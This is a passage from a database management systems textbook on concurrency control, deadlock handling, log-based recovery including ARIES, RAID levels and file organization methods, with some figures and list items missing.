3. Write phase: If there is no violation found in validation phase, updates are done in the
database; otherwise, Ti is rolled back.
In a current schedule, the three phases of transactions can be interleaved, but each
transaction must go through the three phases in the above order. For simplicity we can assume
that the validation and write phase occur together.
Validation tests use above timestamps and read/write sets to ensure that serializability
order is determined by validation time, TS(Ti) = ValidationTS(Ti). For all Ti with TS (Ti) < TS
(Tj) if any one of the following condition holds:
and Tj does not read any data item written by Ti, then the validation succeeds and Tj can be
committed. Otherwise, validation fails and Tj is aborted. If probability of conflicts is low, then
the Validation-based protocol provides greater degree of concurrency when compared with
locking or Time Stamp Ordered protocol. Example of schedule produced using validation is
given in Figure 7.6.
Database Management Systems 7.15
Multiple Granularity locking allows data items to be of various sizes and define a
hierarchy of data granularities, where the small granularities are nested within larger ones. It
can be represented as a tree and when a transaction locks a node in the tree explicitly, it
implicitly locks all the node's descendants which are in the same mode. The locks have to be
acquired from root to leaf, whereas they have to be released from leaf to root. If there are too
many locks at a particular level, then switch to higher granularity S or X lock, termed as lock
granularity escalation.
There are two types of granularity of locking which specifies the level in the tree where
locking is done:
• Fine granularity (lower in tree)
▪ high concurrency
▪ high locking overhead
• Coarse granularity (higher in tree)
▪ low concurrency
▪ low locking overhead
Example of Granularity Hierarchy is given in Figure 7.7. The levels, starting from the
coarsest (top) level are
• database
• area
• file
• record
7.16 Concurrency Control
In addition to S and X lock modes, there are three additional lock modes with multiple
granularity:
• intention-shared (IS): indicates explicit locking at a lower level of the tree but only
with shared locks.
• shared and intention-exclusive (SIX): the subtree rooted by that node is locked
explicitly in shared mode and explicit locking is being done at a lower level with
exclusive-mode locks.
Intention locks allow a higher level node to be locked in S or X mode without having to
check all descendent nodes.
The compatibility matrix for all lock modes is shown in Figure 7.8:
In this schedule, neither T3 nor T4 can make progress. The reason is that T3 has locked
the data-item B in exclusive mode, and T3 request lock on B in shared mode which causes T4
to wait for T3 to release its lock on B. Similarly T3 waits for T4 to release its lock on A. Such a
situation is called a deadlock and to handle the deadlock either T3 or T4 must be rolled back
and its locks released.
Imagine a situation in which T1 has locked a data item X in shared mode. T2 needs to
acquire the lock in exclusive mode and waiting for T1 to release the lock an X-lock. Some other
transactions may in sequence request for S-lock on the same item and it would have been
granted also since T1 has locked in shared mode only. In that case, the same transaction is
repeatedly rolled back due to deadlocks. This leads to Starvation and Concurrency control
manager should be designed to prevent starvation.
Deadlock prevention protocols ensure that the system will never enter into a deadlock
state. Some prevention strategies:
• Require that each transaction locks all its data items before it begins execution.
• Impose partial ordering of all data items and require that a transaction can lock data
items only in the order specified by the partial order.
There are two approaches in deadlock prevention. One approach ensures that all the
required locks are acquired together so that no cyclic waits can occur. The other approach is
closer to deadlock recovery, and performs transaction rollback instead of waiting for a lock.
The simplest scheme under the first approach requires that each transaction locks all the
required data items before it begins execution. Either all are locked in one step or none are
locked. There are two main disadvantages to this protocol:
(1) It is often hard to predict what data items need to be locked, before the transaction
begins.
(2) data-item utilization may be very low because many data items may be locked but
unused for a long time.
The second approach for preventing deadlocks is to impose an ordering of all data items
and the transaction can lock data items only in a sequence mentioned in the ordering.
Once a transaction has locked a particular item, it cannot request locks on items that
precede that item in the ordering. This scheme is easy to implement only when the data items
to be accessed by a transaction is known at the beginning of execution itself.
Database Management Systems 7.19
Based on a counter or on the system clock, a unique time stamp is assigned to each
transaction when it begins. The system uses these timestamps to decide whether a transaction
should wait or roll back. If a transaction is rolled back, it retains its old timestamp when
restarted. There are two different deadlock-prevention schemes using timestamps have been
proposed.
a. wait-die
wait-die is non-preemptive scheme. If the transaction is older, then it may wait for
younger one to release the lock on the data item. But if the transaction is younger, it
never waits for older transaction to release the lock on the data item an they are rolled
back. But the drawback is that a transaction may die several times before acquiring a
lock.
b. wound-wait
In both schemes, a rolled back transaction is restarted with its original timestamp and
ensures that older transactions have precedence over newer ones, and starvation is thus
avoided.
In timeout based schemes, a transaction waits for a lock only for a specified amount of
time and after that the transaction is rolled back. The time-out scheme is simple to
implement and ensures that deadlocks get resolved by timeout. But may roll back
transaction unnecessarily even in absence of deadlock and it is difficult to determine
good value of the timeout interval. Starvation is also possible.
Fig. 7.10 a Wait-for graph without a cycle b)Wait-for graph with a cycle
After the detection of deadlock, some transaction will have to be rolled back (made a
victim) in order to break deadlock cycle.
▪ Partial rollback: Roll back victim transaction only as far as necessary to release
locks that another transaction in cycle is waiting for
Starvation may happen during recovery and a solution is that oldest transaction in the
deadlock set is never chosen as victim.
CHAPTER – VIII
RECOVERY
A computer system may subject to failure due to disk crash, power outage, software
error, a fire in the machine room and information may be lost. The database system must take
actions in advance to ensure that the atomicity and durability properties of transactions. A
recovery scheme can restore the database to the consistent state that existed before the failure.
The recovery scheme must also provide high availability i.e., minimize the time for which the
database is not usable after a failure.
ii. Actions taken after a failure to recover the database contents to a state that ensures
consistency, atomicity and durability.
8.1.2 Storage
The various data items in the database may be stored and accessed in a number of
different storage media. There are three categories of storage:
▪ Stable storage
▪ Volatile storage
▪ Nonvolatile storage
Stable storage plays a critical role in recovery algorithms. To implement stable storage,
we need to replicate the needed information in several nonvolatile storage media (usually disk)
with independent failure modes, and to update the information in a controlled manner to ensure
that failure during data transfer does not damage the needed information. Block transfer
between memory and disk storage can result in:
• Successful completion: The transferred information arrived safely at its destination.
• Partial failure: A failure occurred during transfer, and the destination block has incorrect
information.
• Total failure: The failure occurred sufficiently early during the transfer that the
destination block remains intact.
We require that, if a data-transfer failure occurs, the system detects it and invokes a
recovery procedure to restore the block to a consistent state. To do so, the system must maintain
two physical blocks for each logical database block. In the case of mirrored disks, both blocks
are at the same location and in the case of remote backup, one of the blocks is local, whereas
the other is at a remote site. An output operation is executed as follows:
1. Write the information onto the first physical block.
2. When the first write completes successfully, write the same information onto the
second physical block.
3. The output is completed only after the second write completes successfully.
If the system fails while blocks are being written, it is possible that the two copies of a
block are inconsistent with each other. During recovery, for each block, the system would need
to examine two copies of the blocks. If both are the same and no detectable error exists, then no
further actions are necessary. But if the system detects an error in one block, then it replaces
its content with the content of the other block. If both blocks contain no detectable error, but
they differ in content, then the system replaces the content of the first block with the value of
the second. This recovery procedure ensures that a write to stable storage either succeeds
Database Management Systems 8.3
Each transaction Ti has a private work area in which copies of data items accessed and
updated by Ti are kept. The system creates this work area when the transaction is initiated and
removes it when the transaction either commits or aborts. Each data item X kept in the work
area of transaction Ti is denoted by xi. Transaction Ti interacts with the database system by
transferring data to and from its work area to the system buffer using these two operations:
1. read(X) assigns the value of data item X to the local variable xi . It executes as follows:
2. write(X) assigns the value of local variable xi to data item X in the buffer block. It
executes this operation as follows:
A buffer block is eventually written out to the disk either because the buffer manager
needs the memory space for other purposes or because the database system wishes to reflect the
change to B on the disk. The database system performs a force-output of buffer B if it issues an
output(B).
When a transaction needs to access a data item X for the first time, it must execute
read(X). The system then performs all updates to X on xi . At any point during its execution a
transaction may execute write(X) to reflect the change to X in the database itself.
The output(BX) operation for the buffer block BX on which X resides does not need to
take effect immediately after write(X) is executed, since the block BX may contain other data
items that are still being accessed. The actual output may take place later. If the system crashes
after the write(X) operation was executed but before output (BX) was executed, the new value
of X is never written to disk and, thus, is lost.
Consider a transaction Ti that transfers Rs.50 from account A to account B, with initial
values of A and B being Rs.1000 and Rs.2000, respectively. Suppose that a system crash has
occurred during the execution of Ti , after output(BA) has taken place, but before output(BB)
was executed, where BA and BB denote the buffer blocks on which A and B reside.
When the system restarts, the value of A would be $950, while that of B would be $2000,
which is clearly inconsistent with the atomicity requirement for transaction Ti . Unfortunately,
Database Management Systems 8.5
there is no way to find out by examining the database state what blocks had been output, and
what had not, before the crash.
To achieve our goal of atomicity, we must first output to stable storage information
describing the modifications, without modifying the database itself. This information can help
us ensure that all modifications performed by committed transactions are reflected in the
database during recovery.
The most widely used structure for recording the modifications done in a database is the
log. The log is a sequence of log records, recording all the update activities in the database.
There are several types of log records. An update log record describes a single database write.
It has these fields:
• Transaction identifier - the unique identifier of the transaction that performed the write
operation.
• Data-item identifier - the unique identifier of the data item written. Typically, it is the
location on disk of the data item with the block identifier of the block and an offset
within the block.
• Old value - the value of the data item prior to the write.
• New value - the value that the data item will have after the write.
The update log record is represented as <Ti, Xj , V1, V2>, indicating that transaction Ti
has performed a write on data item Xj . Xj had value V1 before the write, and has value V2 after
the write. There are special log records to record significant events during transaction
processing.
Whenever a transaction performs a write, the log record for that write will be created
8.6 Recovery
and added to the log, before the database is modified. Once a log record exists, we can output
the modification to the database. Also, we have the ability to undo a modification by setting
with the old-value field in log records.
For log records to be useful for recovery from system and disk failures, the log must
reside in stable storage. For now, we assume that every log record is written to the end of the
log on stable storage as soon as it is created.
A transaction creates a log record before modifying the database. The log records allow
the system to undo changes, if the transaction must be aborted. Similarly, they allow the system
to redo the changes, if the transaction has committed but the system crashed before those
changes are stored in the database on disk. The steps in modifying a data item are:
1. The transaction performs some computations in its own private part of main memory.
2. The transaction modifies the data block in the disk buffer in main memory holding the
data item.
3. The database system executes the output operation that writes the data block to disk.
There are two types of database modification techniques – deferred and immediate.
o Output of updated blocks to disk can take place at any time before or after
transaction commit
o Order in which blocks are output can be different from the order in which they
are written.
o But has overhead, since the transactions need to make local copies of all
updated data items
Database Management Systems 8.7
• The possibility that a transaction may have committed although some of its database
modifications exist only in the disk buffer in main memory and not in the database
on disk.
• The possibility that a transaction may have modified the database while in the active
state and, as a result of a subsequent failure, may need to abort.
Because all database modifications must be preceded by the creation of a log record, the
system has available both the old value prior to the modification of the data item and the
new value that is to be written for the data item. This allows the system to perform undo
and redo operations as appropriate.
• Undo using a log record sets the data item specified in the log record to the old
value.
• Redo using a log record sets the data item specified in the log record to the new
value.
Imagine a situation in which transaction T1 has modified a data item X and the
concurrency control scheme permits another transaction T2 to modify X before T1 commits. If
undo operation is done in T1 (which restores the old value of X) , then the undo operation should
be done in T2 also. In order to avoid this situation, recovery algorithms require that if a data
item has been modified by a transaction, no other transaction can modify the data item until the
first transaction commits or aborts.
This requirement can be satisfied by using strict two-phase locking in which the
exclusive lock acquired on any up-dated data item is released after the transaction commits.
Snapshot-isolation and validation-based concurrency-control techniques also holds the acquired
exclusive locks until the transaction is committed.
A transaction is said to be committed, when its commit log record, (the last log record)
has been written to stable storage. At that point all the previous log records have already been
output to stable storage. If there is a system crash, then the updates of the transaction can be
redone. If the system crash occurs before a log record < Ti commit> is output to stable storage,
then the transaction Ti will be rolled back.
Let us see how the log can be used to recover from a system crash, and to roll back
transactions during normal operation. Consider a transaction T0 is a transaction which transfers
Rs.50 from account A to account B. Initial balance in A is 1000 and B is 2000.
T0: read(A);
A := A-50;
write(A);
read(B);
B := B + 50;
write(B).
Let T1 be a transaction that withdraws $100 from account C. Initial balance in account C is :
T1: read(C);
C := C-100;
write(C).
The portion of the log which contains the relevant information with respect to the
transactions T0 and T1 is shown below.
<T0 start>
<T0 commit>
<T1 start>
Database Management Systems 8.9
<T1 commit>
A possible order in which the actual outputs took place in both the database system and
the log as a result of the execution of T0 and T1 is shown below.
Log Database
<T0 start>
A = 950
B = 2050
<T0 commit>
<T1 start>
C = 600
<T1 commit>
Using the log, the system can handle any failure other than the loss of information in
nonvolatile storage. The recovery scheme uses two recovery procedures redo(Ti) and undo(Ti).
• redo(Ti) sets the value of all data items updated by transaction Ti to the new values. The
order in which updates are carried out by redo is important. When recovering from a
system crash, if updates to a particular data item are applied in an order different from
the order in which they were applied originally, the final state of that data item will have
a wrong value.
• undo(Ti ) restores the value of all data items updated by transaction Ti to the old values.
The undo operation not only restores the data items to their old value, but also writes
log records to record the updates performed as part of the undo process. These log
records are special redo-only log records, since they do not need to contain the old-value
of the updated data item.
Similar to redo procedure, the order in which undo operations are performed is
8.10 Recovery
important. When the undo operation for transaction Ti completes, it writes a <Ti abort> log
record, indicating that the undo has completed.
After a system crash has occurred, the system consults the log to determine which
transactions need to be redone, and which need to be undone so as to ensure atomicity.
• Transaction Ti needs to be undone if the log contains the record <Ti start>, but does not
contain either the record <Ti commit> or the record <Ti abort>.
• Transaction Ti needs to be redone if the log contains the record <Ti start> and either the
record <Ti commit> or the record <Ti abort>.
Let us return to our banking example, with transaction T0 and T1 executed in serial order,
T0 followed by T1. Suppose that the system crashes before the successful completion of the
transactions. We shall consider three cases. The logs for each of these cases are as shown below
in Figure 8.2.
Case 1:
First, let us assume that the crash occurs just after the log record for the step
write(B)
of transaction T0 has been written to stable storage (Figure 8.2a). When the system
resumes, it finds the <T0 start> in the log, but there is no corresponding <T0 commit>
or <T0 abort> record. Hence undo(T0) is performed and the amount in the accounts A
and B (on the disk) are restored to Rs.1000 and Rs.2000, respectively.
Case 2:
Let us assume that the crash comes just after the log record for the step:
write(C)
Database Management Systems 8.11
of transaction T1 has been written to stable storage (Figure 8.2b). When the system
resumes back, two recovery actions need to be taken. The log contains both the record
<T0 start> and the record <T0 commit> and hence redo(T0) must be performed . The log
contains the record <T1 start> but there is no record <T1 commit> or <T1 abort> and
hence undo(T1) must be performed. At the end of the entire recovery procedure, the
values of accounts A, B, and C are $950, $2050, and $700, respectively.
Case 3:
Let us assume that the crash occurs just after the log record:
<T1 commit>
has been written to stable storage (Figure 8.2c). When the system resumes back, both
T0 and T1 need to be redone, since the records <T0 start> and <T0 commit> appear in
the log, as do the records <T1 start> and <T1 commit>. After the system performs the
recovery procedures redo(T0) and redo(T1), the values in accounts A, B, and C are $950,
$2050, and $600, respectively.
8.2.6 Checkpoints
When a system crash occurs, we must refer the log to determine those transactions that
need to be redone and those that need to be undone. In principle, we need to search the entire
log to determine this information. There are two major difficulties with this approach:
2. Most of the transactions that, according to our algorithm, need to be redone have
already written their updates into the database. Although redoing them will cause
no harm, it will nevertheless cause recovery to take longer.
Check points reduce these types of overhead. There are two check point scheme that:
(a) does not permit any updates to be performed while the checkpoint operation is in
progress,
(b) outputs all modified buffer blocks to disk when the checkpoint is performed.
1. Output onto stable storage all log records currently residing in main memory.
3. Output onto stable storage a log record of the form <checkpoint L>, where
8.12 Recovery
L is a list of transactions active at the time of the checkpoint. Transactions are not
allowed to perform any update actions, such as writing to a buffer block or writing a log record,
while a checkpoint is in progress.
The presence of a <checkpoint L> record in the log allows the system to streamline its
recovery procedure. Consider a transaction Ti that completed prior to the checkpoint. For such
a transaction, the <Ti commit> record or < Ti abort> record appears in the log before the
<checkpoint> record. Any database modifications made by Ti must have been written to the
database either prior to the checkpoint or as part of the checkpoint itself. Thus, at recovery time,
there is no need to perform a redo operation on Ti.
After a system crash has occurred, the system examines the log to find the last
<checkpoint L> record by searching the log backward, from the end of the log, until the first
<checkpoint L>.
The redo or undo operations need to be applied only to transactions in L, and to all
transactions that started execution after the <checkpoint L> record was written to the log. Let
us denote this set of transactions as T.
• For all transactions Tk in T that have no <Tk commit> record or <Tk abort> record in
the log, execute undo(Tk).
• For all transactions Tk in T such that either the record <Tk commit> or the record <Tk
abort> appears in the log, execute redo(Tk).
For example, consider the set of transactions T0, T1,...,T100. Suppose that the most recent
checkpoint took place during the execution of transaction T67 and T69, while T68 and all
transactions with subscripts lower than 67 are completed before the checkpoint. Transactions
T67, T69,...,T100 only need to be considered during the recovery scheme. Each of them needs to
be redone if it has completed or undone, if incomplete. Fuzzy checkpoint is a checkpoint where
transactions are allowed to perform updates even while buffer blocks are being written out.
The recovery algorithm requires that a data item that has been updated by an
uncommitted transaction cannot be modified by any other transaction, until the first transaction
has either committed or aborted.
i. Transaction Rollback
First consider transaction rollback during normal operation i.e., not during recovery
from a system crash. Rollback of a transaction Ti is performed as follows:
Database Management Systems 8.13
1. The log is scanned backward, and for each log record of Ti of the form <Ti , Xj ,
V1, V2> that is found:
b. A special redo-only log record <Ti, Xj , V1> is written to the log, where V1 is
the value being restored to data item Xj during the rollback. These log records
are sometimes called compensation log records.
2. Once the log record <Ti start> is found the backward scan is stopped, and a log
record <Ti abort> is written to the log.
1. Redo phase
In the redo phase, the system replays updates of all transactions by scanning the log
forward from the last checkpoint. The log records that are replayed include log
records for transactions that were rolled back before system crash, and those that
had not committed when the system crash occurred. This phase also determines all
transactions that were incomplete at the time of the crash, and must therefore be
rolled back. Such incomplete transactions would either have been active at the time
of the checkpoint, and thus would appear in the transaction list in the checkpoint
record, or would have started later. Further, such incomplete transactions would
have neither a <Ti abort> nor a <Ti commit> record in the log.
a. The list of transactions to be rolled back, undo-list, is initially set to the list L
in the <checkpoint L> log record.
b. Whenever a normal log record of the form <Ti , Xj , V1, V2>, or a redo-only log
record of the form <Ti , Xj , V2> is encountered, the operation is redone i.e.,,
the value V2 is written to data item Xj .
c. Whenever a log record of the form <Ti start> is found, Ti is added to undo-list.
d. Whenever a log record of the form <Ti abort> or <Ti commit> is found, Ti is
removed from undo-list.
At the end of the redo phase, undo-list contains the list of all transactions that are
incomplete, that is, they neither committed nor completed rollback before the crash.
8.14 Recovery
2. Undo Phase
In the undo phase, the system rolls back all transactions in the undo-list. It performs
rollback by scanning the log backward from the end.
a. Whenever it finds a log record belonging to a transaction in the undo- list, it
performs undo actions just as if the log record had been found during the
rollback of a failed transaction.
b. When the system finds a <Ti start> log record for a transaction Ti in undo-list,
it writes a <Ti abort> log record to the log, and removes Ti from undo-list.
c. The undo phase terminates once undo-list becomes empty, that is, the system
has found <Ti start> log records for all transactions that were initially in undo-
list.
After the undo phase of recovery terminates, normal transaction processing can resume.
Figure 8.3 shows an example of actions logged during normal operation, and actions
performed during failure recovery. In the log shown in the figure, transaction T1 had committed,
and transaction T0 had been completely rolled back, before the system crashed.
When recovering from a crash, in the redo phase, the system performs a redo of all
operations after the last checkpoint record. In this phase, the list undo-list initially contains T0
and T1. T1 is removed first when its commit log record is found, while T2 is added when its start
log record is found. Transaction T0 is removed from undo-list when its abort log record is found,
leaving only T2 in undo-list. The undo phase scans the log backwards from the end, and when
it finds a log record of T2 updating A, the old value of A is restored, and a redo-only log record
written to the log. When the start record for T2 is found, an abort record is added for T2. Since
undo-list contains no more transactions, the undo phase terminates, completing recovery.
Database Management Systems 8.15
In the shadow-copy scheme, a transaction that wants to update the database first creates
a complete copy of the database. All updates are done on the new database copy, keeping the
original shadow copy, untouched. If at any point the transaction has to be aborted, the system
merely deletes the new copy. The old copy of the database has not been affected. The current
copy of the database is identified by a pointer, called db-pointer, which is stored on disk. The
Figure 8.4 shows the shadow paging scheme.
If the transaction partially commits i.e., executes its final statement, it is committed as
follows:
1. The operating system is asked to make sure that all pages of the new copy of the
database have been written out to disk.
2. After the operating system has written all the pages to disk, the database system
updates the pointer db-pointer to point to the new copy of the database.
3. The new copy then becomes the current copy of the database.
5. The transaction is said to have been committed at the point where the updated db-
pointer is written to disk.
The implementation actually depends on the write to db-pointer being atomic - either
all its bytes are written or none of its bytes are written. Disk systems provide atomic updates to
entire blocks, or at least to a disk sector. In other words, the disk system guarantees that it will
update db-pointer atomically.
Shadow copy schemes are commonly used by text editors. Shadow copying can be used
for small databases, but it would be extremely expensive for a large database. A variant of
shadow-copying, called shadow-paging, reduces copying as follows.
8.16 Recovery
▪ Page table itself and all updated pages are copied to a new location.
▪ Any page which is not updated by a transaction is not copied, but instead the new
page
▪ When a transaction commits, it atomically updates the pointer to the page table,
which
Shadow paging does not work well with concurrent transactions and is not widely
used in databases.
8.5 ARIES
1. Uses log sequence number (LSN) to identify log records and stores LSNs in pages to
identify what updates have already been applied to a database page
4. Uses fuzzy checkpointing that only records information about dirty pages and does not
require dirty pages to be written out at checkpoint time.
▪ Physical redo would require logging of old and new values for much of the page
Database Management Systems 8.17
a. Analysis pass: Determines Which transactions to undo, which pages were dirty at the
time of crash
b. Redo pass: Repeats history, redoing all actions from RedoLSN to bring the database to
a state it was in before the crash.
a. Analysis pass
b. Redo Pass
Redo Pass repeats history by replaying every action not already reflected in the page on
disk. It scans the log forward from RedoLSN. Whenever an update log record is found,
it takes the following action:
1. If the page is not in DirtyPageTable or the LSN of the log record is less than the RecLSN
of the page in DirtyPageTable, then skip the log record
2. Otherwise fetch the page from disk. If the PageLSN of the page fetched from disk is
less than the LSN of the log record, redo the log record
c. Undo Pass
Undo pass performs backward scan on log undoing all transaction in undo-list.
Backward scan optimized by skipping unneeded log records as follows:
• Next LSN to be undone for each transaction set to LSN of last log record for
transaction found by analysis pass.
• At each step pick largest of these LSNs to undo, skip back to it and undo it
• After undoing a log record
▪ For ordinary log records, set next LSN to be undone for transaction to PrevLSN
noted in the log record
▪ For compensation log records (CLRs) set next LSN to be undo to UndoNextLSN
noted in the log record
8.5.3 Recovery Actions in ARIES
Figure 8.6 illustrates the recovery actions performed by ARIES, on an example log. We
assume that the last completed checkpoint pointer on disk points to the checkpoint log record
with LSN 7568. The PrevLSN values in the log records are shown using arrows in the figure,
while the UndoNextLSN value is shown using a dashed arrow for the one compensation log
record, with LSN 7565. The analysis pass would start from LSN 7568, and when it is complete,
RedoLSN would be 7564. Thus, the redo pass must start at the log record with LSN 7564. Note
that this LSN is less than the LSN of the checkpoint log record, since the ARIES checkpointing
algorithm does not flush modified pages to stable storage. The DirtyPageTable at the end of
analysis would include pages 4894, 7200 from the checkpoint log record, and 2390 which is
updated by the log record with LSN 7570. At the end of the analysis pass, the list of transactions
to be undone consists of only T145 in this example. The redo pass for the above example starts
from LSN 7564 and performs redo of log records whose pages appear in DirtyPageTable. The
undo pass needs to undo only transaction T145, and hence starts from its LastLSN value 7567,
and continues backwards until the record < T145 start> is found at LSN 7563.
8.20 Recovery
3. Fine-grained locking - Index concurrency algorithms that permit tuple level locking on
indices can be used
4. Recovery optimizations:
▪ Out of order redo is possible and redo can be postponed and other log records can
continue to be processed.
CHAPTER – IX
DATA STORAGE
9.1 RAID
RAID (redundant array of independent disks) originally redundant array of inexpensive
disks) is a way of storing the same data in different places on multiple hard disks to protect data
in the case of a drive failure.
9.1.1. Introduction
Disk organization techniques manage a large number of disks, providing a view of a
single disk of high capacity and high speed by using multiple disks in parallel, and high
reliability by storing data redundantly, so that data can be recovered even if a disk fails.
9.1.2. Motivation for RAID
• Just as additional memory in form of cache, can improve the system performance, in the
same way additional disks can also improve system performance.
• In RAID we can use an array of disks which operates independently since there are many
disks, multiple I/O requests can be handled in parallel if the data required is on separate
disks
• A single I/O operation can be handled in parallel if the data required is distributed across
multiple disks.
9.1.3. Benefits of RAID
• Data loss can be very dangerous for an organization
• RAID technology prevents data loss due to disk failure
• RAID technology can be implemented in hardware or software
• Servers make use of RAID Technology
9.1.4. RAID Levels
RAID Level 0: Stripping and non-redundant
• RAID level 0 divides data into block units and writes them across a number of disks. As
data is placed across multiple disks it is also called ―data Striping.
9.2 Data Storage
• The advantage of distributing data over disks is that if different I/O requests are pending
for two different blocks of data, then there is a possibility that the requested blocks are
on different disks
There is no parity checking of data. So, if data in one drive gets corrupted then all the
data would be lost. Thus RAID 0 does not support data recovery Spanning is another
term that is used with RAID level 0 because the logical disk will span all the physical
drives. RAID 0 implementation requires minimum 2 disks.
Advantages
• I/O performance is greatly improved by spreading the I/O load across many channels &
drives.
• Best performance is achieved when data is striped across multiple controllers with only
one driver per controller.
Disadvantages
• It is not fault-tolerant; failure of one drive will result in all data in an array being lost.
• Also known as disk mirroring; this configuration consists of at least two drives that
duplicate the storage of data. There is no striping.
• Read performance is improved since either disk can be read at the same time. Write
performance is the same as for single disk storage.
• Every write is carried out on both disks. If one disk in a pair fails, data still available in
the other.
• Data loss would occur only if a disk fails, and its mirror disk also fails before the system
is repaired Probability of combined event is very small.
Database Management Systems 9.3
RAID Level 2:
This configuration uses striping across disks. This level stripes data at a bit level and
each bit is stored in a separate drive. It requires a disk separately for storing ECC code of data.
The level uses the Hamming code for error correction. It is no longer or rarely used.
Advantages
Disadvantages
• The need for hamming code makes it inconvenient for commercial use.
9.4 Data Storage
The RAID 3 level stripes data at the byte level. It requires a separate parity disk which
stores the parity information for each byte. When a disk fails, data can be recovered with the
help of parity bytes corresponding to them for example to recover data in a damaged disk,
compute XOR of bits from other disks (including parity bit disk)
When writing data, corresponding parity bits must also be computed and written to a
parity bit disk. I/O operation addresses all the drives at the same time, RAID 3 cannot overlap
I/O. For this reason, RAID 3 is best for single-user systems with long record applications.
Advantages
• In case of a disk failure, data can be reconstructed using the corresponding parity byte.
Disadvantages
RAID 4 is a quite popular one. It is similar to RAID 1 and RAID 3 in a few ways. It
goes for a block level data stripping which is similar to RAID 0. Just like RAID 3, it uses parity
disk to store data. When you combine both these features together you will clearly understand
what RAID 4 does. It stripes data at the block level and stores its corresponding parity bytes in
the parity disk. In case of a single disk failure, data can be recovered from this parity disk.
Advantages
• In case of a single disk failure, the lost data is recovered from the parity disk.
Disadvantages
• It does not solve the problem of more than one disk failure.
• The level needs at least 3 disks as well as hardware backing for doing parity calculations.
RAID Level 5:
• RAID 5 uses striping as well as parity for redundancy. It is well suited for heavy read
and low write operations.
9.6 Data Storage
• Block-Interleaved Distributed Parity; partitions data and parity among all N + 1 disks,
rather than storing data in N disks and parity in 1 disk. So this level has some similarity
with RAID 4.
Advantages
• This level is known for distributed parity among the various disks in the group.
• It uses only one-fourth of the storage capacity for parity and leaves three-fourths of the
capacity to be used for storing data.
Disadvantages
• The recovery of data takes longer due to parity distributed among all disks.
• It is not able to help in the case where more than one disk fails.
RAID Level 6:
• This technique is similar to RAID 5, but includes a second parity scheme that is
distributed across the drives in the array. The use of additional parity allows the array to
continue to function even if two disks fail simultaneously. However, this extra
protection comes at a cost.
• P+Q Redundancy scheme; similar to Level 5, but stores extra redundant information to
guard against multiple disk failures. Better reliability than Level 5 at a higher cost; not
used as widely.
Database Management Systems 9.7
Advantages
• It can help you in case of 2 simultaneous disk failures.
• The number of drives for this level should be an even number with a minimum of 4
drives.
Disadvantages
• It uses only half for storing data as the other half is used for mirroring.
• It needs two extra disks for parity.
• It needs to write in two parity blocks and hence is slower than RAID 5.
• It has inadequate adaptability.
Each RAID level has its own set of advantages and disadvantages. So you have to decide
what you are looking for is safety or speed or storage space.
9.2. FILE ORGANIZATION
We know that data is stored in database, when we refer this data in terms of RDBMS
we call it collection of inter-related tables. However in layman terms you can say that the data
is stored in a physical memory in the form of files.
File organization is a way of organizing the data in such way so that it is easier to insert,
delete, modify and retrieve data from the files.
• File organization makes it easier & faster to perform operations (such as read, write,
update, delete etc.) on data stored in files.
9.8 Data Storage
• Removes data redundancy. File organization make sure that the redundant and duplicate
data gets removed. This alone saves the database from insert, update, delete operation
errors which usually happen when duplicate data is present in database.
• It saves storage cost. By organizing the data, the redundant data gets removed, which
lowers the storage space required to store the data.
• Improves accuracy. When redundant data gets removed and the data is stored in efficient
manner, the chances of data get wrong and corrupted goes down.
There are various ways to organize the data. Every file organization method is different
from each other; therefore, each file organization method has its own advantages and
disadvantages. It is up to the developer which method they choose in order to organize the data.
Usually, this decision is made based on what kind of data is present in database.
In Pile File method one record is inserted after another record and the new record is
always inserted at the end of the file. If any record needs to be deleted, it gets searched
in the memory block and once it is deleted a new record can be written on the freed
memory block.
Database Management Systems 9.9
The Figure 9.1 shows a File that is being organized using Pile File method, as you can
see the records are not sorted and inserted in first come first serve basis. If you want to
organize the data in such a way that it gets sorted after insertion then use the sorted file
method, which is discussed in next section.
Here we are demonstrating the insertion of a new record R3 in an already present file
using Pile File method. Since this method of sequential organization just adds the new
record at the end of file, the new record R3 gets added at the end of the file, as shown
in the Figure 9.2.
In sorted file method, a new record is inserted at the end of the file and then all the
records are sorted to adjust the position of the newly added record. In Figure 9.3, records
appear in sorted order when the file is organized using sorted file method. In case of a
record updation, once the update is complete, the whole file gets sorted again to change
the position of updated record in the file.
9.10 Data Storage
The sorting can be either ascending or descending; in Figure 9.3, the records are sorted
in ascending order.
In Figure 9.4, a new record R3 is added to an existing file. Although the record is added
at the end, its position gets changed after insertion. The whole file gets sorted after
addition of the new record and the new record R3, is placed just after record R1 as the
file is sorted in ascending order using sorted file method of sequential file organization.
Advantages
• It is fast and efficient when we are dealing with huge amount of data.
Database Management Systems 9.11
• This method of file organization is mostly used for generating various reports and
performing statistical operations on data.
Disadvantages
• Sorting the file takes extra time and it requires additional storage for sorting
operation.
Heap File Organization method is simple yet powerful file organization method. In this
method, the records are added in memory data blocks, in no particular order. Figure 9.5
demonstrates the Heap file organization. As you can see, records have been assigned to data
blocks in memory in no particular order.
Since the records are not sorted and not stored in consecutive data blocks in memory,
searching a record is time consuming process in this method. Update and delete operations also
give poor performance as the records needs to be searched first for updation and deletion, which
is already a time consuming operation. However if the file size is small, these operations give
one of the best performances compared to other methods so this method is widely used for small
size files. This method requires memory optimization and cleanup as this method doesn’t free
up the allocated data block after a record is deleted.
Data Insertion
Figure 9.6 demonstrates the addition of a new record in the file using heap file
organization method. As you can see a free data block which has not been assigned to any
9.12 Data Storage
record previously, has been assigned to the newly added record R2. The insertion of new record
is pretty simple in this method as there is no need to perform any sorting; any free data block is
assigned to the new record.
Advantages
• This is a popular method when huge amount of records needs to be added in the
database. Since the records are assigned to free data blocks in memory there is no need
to perform any special check for existing records, when a new record needs addition.
This makes it easier to insert multiple records all at once without worrying about
messing with the file organization.
• When the records are less and file size is small, it is faster to search and retrieve the data
from database using heap file organization compared to sequential file organization.
Disadvantages
• This method is inefficient if the file size is big, as the search, retrieve and update
operations consume more time compared to sequential file organization.
• This method doesn’t use the memory space efficiently, thus it requires memory cleanup
and optimization to free the unused data blocks in memory.
Database Management Systems 9.13
In this method, hash function is used to compute the address of a data block in memory
to store the record. The hash function is applied on certain columns of the records, known as
hash columns to compute the block address. These columns/fields can either be key or non-key
attributes.
Figure 9.7 demonstrates the hash file organization. As shown here, the records are stored
in database in no particular order and the data blocks are not consecutive. These memory
addresses are computed by applying hash function on certain attributes of these records.
Fetching a record is faster in this method as the record can be accessed using hash key column.
No need to search through the entire file to fetch a record.
Inserting a record
In Figure 9.8, you can see that a new record R5 needs to be added to the file. The same
hash function that generated the address for existing records in the file, will be used again to
